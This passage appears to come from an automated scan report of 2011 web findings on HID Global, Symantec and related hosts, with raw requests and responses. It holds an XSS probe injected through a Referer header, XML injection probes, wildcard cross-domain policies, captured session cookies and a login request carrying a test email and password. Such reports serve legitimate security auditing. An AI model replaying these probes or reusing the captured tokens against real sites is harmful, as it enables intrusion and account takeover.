Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]
Referer: http://www.google.com/search?hl=en&q=fbcd0'><script>alert(1)</script>b2f844e050f

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:30:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=fbcd0'><script>alert(1)</script>b2f844e050f'>
...[SNIP]...

3. Flash cross-domain policy  previous  next
There are 7 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 14 Feb 2011 23:37:03 GMT
Date: Sun, 13 Feb 2011 23:37:03 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 68906

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.2. http://hidglobal.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hidglobal.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hidglobal.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:03 GMT
Server: Omniture DC/2.0.0
xserver: www45
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.3. http://metrics.hidglobal.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.hidglobal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.hidglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:44 GMT
Server: Omniture DC/2.0.0
xserver: www29
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.4. http://s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.amazonaws.com

Response

HTTP/1.1 200 OK
x-amz-id-2: IvowCEKeMFUBC1f5/udeyWrEqjrv4ZTi/44+rAP2gavnj3bkfR032qqwzelZR6Wh
x-amz-request-id: 7419E6619BA7662E
Date: Mon, 14 Feb 2011 18:45:29 GMT
Content-Type: text/xml
Connection: close
Server: AmazonS3

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol
...[SNIP]...

3.5. http://www.b2i.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.b2i.us

Response

HTTP/1.1 200 OK
Content-Length: 208
Content-Type: text/xml
Last-Modified: Mon, 30 Mar 2009 19:08:05 GMT
Accept-Ranges: none
ETag: "4cea3ddb6ab1c91:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:10 GMT
Connection: close
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

3.6. https://www-secure.symantec.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www-secure.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Tue, 17 Nov 2009 23:34:35 GMT
ETag: "22a-4b03330b"
Content-Type: text/xml
Date: Mon, 14 Feb 2011 19:04:37 GMT
Content-Length: 554
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--File added for Flash apps-->
<cross-domain-policy>
<allow-access-from domain="*.symantec.com"/>
<allow-access-from domain="*.norton.com"/>
<allow-access-from domain="*.symantecstore.com"/>
<allow-access-from domain="*.nortonopscenter.com"/>
<allow-access-from domain="*.securityprofessional.com"/>
<allow-access-from domain="*.securitydash.com"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

3.7. http://www.businesswire.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.businesswire.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:18 GMT
Server: Apache
Last-Modified: Wed, 01 Apr 2009 22:36:38 GMT
ETag: "38650-60c-46685f2db8980"
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ecomagination.com" />
<allow-access-from domain="*.ge.com" />
<allow-access-from domain="*.syrupnyc.com" />
<allow-access-from domain="*.geoterra.com" />
<allow-access-from domain="*.geimaginationatwork.com" />
<allow-access-from domain="*.mbia.com" />
<allow-access-from domain="*.mbianet.com" />
<allow-access-from domain="*.mcollis.com" />
<allow-access-from domain="172.21.12.30" />
<allow-access-from domain="*.nationalpfg.com" />
<allow-access-from domain="*.nationalgpf.com" />
<allow-access-from domain="*.nationalpublicfinanceguarantee.com" />
<allow-access-from domain="*.nationalpublicfinancialguarantee.com" />
<allow-access-from domain="*.npfg.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 2 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://hidglobal.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hidglobal.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hidglobal.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:03 GMT
Server: Omniture DC/2.0.0
xserver: www69
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.2. http://metrics.hidglobal.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.hidglobal.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.hidglobal.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:44 GMT
Server: Omniture DC/2.0.0
xserver: www312
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5. Cleartext submission of password  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
</div>

<FORM name='userRegistration' action='/onlineOrderStatusRegistration.php' method='post'>
   <input name='hidOLO' type='hidden' value='true'>
...[SNIP]...
</span> <INPUT style='BACKGROUND-COLOR: #ffffa0' type='password' size='24' value='' name='pw1'> (No spaces)<BR />
...[SNIP]...
</span> <INPUT style='BACKGROUND-COLOR: #ffffa0' type=password size=24 value='' name=pw2> (No spaces)<BR />
...[SNIP]...

6. XML injection  previous  next
There are 5 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


6.1. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /new.cetrk.com/pages/scripts/0010/4106.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /new.cetrk.com]]>>/pages/scripts/0010/4106.js HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 21031285B5D22695
x-amz-id-2: kxTxuC59t8gIFvBvaeQvr0bDXlcVwBLxMeOKC3yFzSWMabjJXr4AxmadQuEWxAWY
Content-Type: application/xml
Date: Mon, 14 Feb 2011 18:46:19 GMT
Server: AmazonS3
Content-Length: 301

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>new.cetrk.com]]&gt;&gt;</BucketName><RequestId>21031285B5D22695
...[SNIP]...

6.2. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /new.cetrk.com/pages/scripts/0010/4106.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /new.cetrk.com/pages]]>>/scripts/0010/4106.js HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 4F745B87C8113CC9
x-amz-id-2: haeGjWG2SAK3AaKH/b2epmTSXA6jOc2JD7jf+lznVoZJ+dO+5hMB35T7GrCH4R+k
Content-Type: application/xml
Date: Mon, 14 Feb 2011 18:46:32 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4F745B87C8113CC9</RequestId><HostId>haeGjWG2SAK3AaKH/b2epmTSXA6jOc2JD7jf+lznVoZJ+dO+5h
...[SNIP]...

6.3. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /new.cetrk.com/pages/scripts/0010/4106.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /new.cetrk.com/pages/scripts]]>>/0010/4106.js HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: C0641092DFF2BBD6
x-amz-id-2: m19VBd6NcKFspCLPpbCim41bxMOzWguxqZ/ml5lMAi2nFEhpANVRCLHf2mN9bldb
Content-Type: application/xml
Date: Mon, 14 Feb 2011 18:46:35 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C0641092DFF2BBD6</RequestId><HostId>m19VBd6NcKFspCLPpbCim41bxMOzWguxqZ/ml5lMAi2nFEhpAN
...[SNIP]...

6.4. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /new.cetrk.com/pages/scripts/0010/4106.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /new.cetrk.com/pages/scripts/0010]]>>/4106.js HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 2F1D62A77E40D581
x-amz-id-2: MkVq2z/Dev5hHgK2p4l2l/V0TbnYNuAzT3zQzQck6/OwgPw8ZrY9ItxbJekgo25R
Content-Type: application/xml
Date: Mon, 14 Feb 2011 18:46:38 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2F1D62A77E40D581</RequestId><HostId>MkVq2z/Dev5hHgK2p4l2l/V0TbnYNuAzT3zQzQck6/OwgPw8Zr
...[SNIP]...

6.5. http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/4106.js [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /new.cetrk.com/pages/scripts/0010/4106.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /new.cetrk.com/pages/scripts/0010/4106.js]]>> HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1185C0800E80C816
x-amz-id-2: XasUjV1wMMrSqTEEySZAwbTuankmbVWOuX2ldm3+w8TakBla6z+ZsfyK121M7AbM
Content-Type: application/xml
Date: Mon, 14 Feb 2011 18:46:41 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1185C0800E80C816</RequestId><HostId>XasUjV1wMMrSqTEEySZAwbTuankmbVWOuX2ldm3+w8TakBla6z
...[SNIP]...

7. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://symaccount.symantec.com
Path:   /SymAccount/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /SymAccount/index.jsp?returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount HTTP/1.1
Host: symaccount.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/connect/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 19:04:03 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001jNJOoXbS6XFi_8-L5Hb1piK:3LT5QVUHCV; Path=/
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 7972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...

8. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. https://symaccount.symantec.com/SymAccount/processLogin.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://symaccount.symantec.com
Path:   /SymAccount/processLogin.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /SymAccount/processLogin.do;jsessionid=0001DNfu-bX8nGtSrqQ5H5C7nhg:-1053KBQ HTTP/1.1
Host: symaccount.symantec.com
Connection: keep-alive
Referer: https://symaccount.symantec.com/SymAccount/index.jsp?returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount
Cache-Control: max-age=0
Origin: https://symaccount.symantec.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B; JSESSIONID=0001DNfu-bX8nGtSrqQ5H5C7nhg:-1053KBQ; s_cc=true; s_sq=symantecmysymantec%2Cveritasnonconsumer%3D%2526pid%253Dbiz%25253A%252520symaccount%25253A%252520member%252520login%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.profile.submit%252528%252529%25253B%2526ot%253DA
Content-Length: 178

uid=test%40fastdial.net&userPassword=No1PassWord&returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount&logoutURL=&forwardURL=&createCancel=&widget=false

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 19:04:24 GMT
Server: IBM_HTTP_Server
Location: https://www-secure.symantec.com/connect/symantec_symaccount?profileURL=https%3A%2F%2Fsymaccount-profile.symantec.com%2FSSO%2Findex.jsp%3FssoID%3D1297710264447yxEYD6y2gcaT3ePjqZ3BLF39b71673g0wER7F
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
